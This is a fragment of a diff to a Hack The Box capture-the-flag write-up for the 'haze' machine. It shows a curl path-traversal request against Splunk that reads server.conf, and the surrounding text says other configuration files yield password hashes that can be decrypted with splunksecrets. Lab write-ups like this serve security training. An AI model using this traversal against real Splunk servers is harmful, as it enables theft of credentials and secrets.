akamee666/ctf_writeups/htb/season7/haze.md

 curl -s 'http://haze.htb:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:/Program%20Files/Splunk/etc/system/local/server.conf'
 ```

-authentication.conf will give you a first and last name, the others file will give you three hashes.
+authentication.conf will give you first and last name from an user, the other files will give you three hashes.
 Use splunksecrets tool to decrypt them.

 ```bash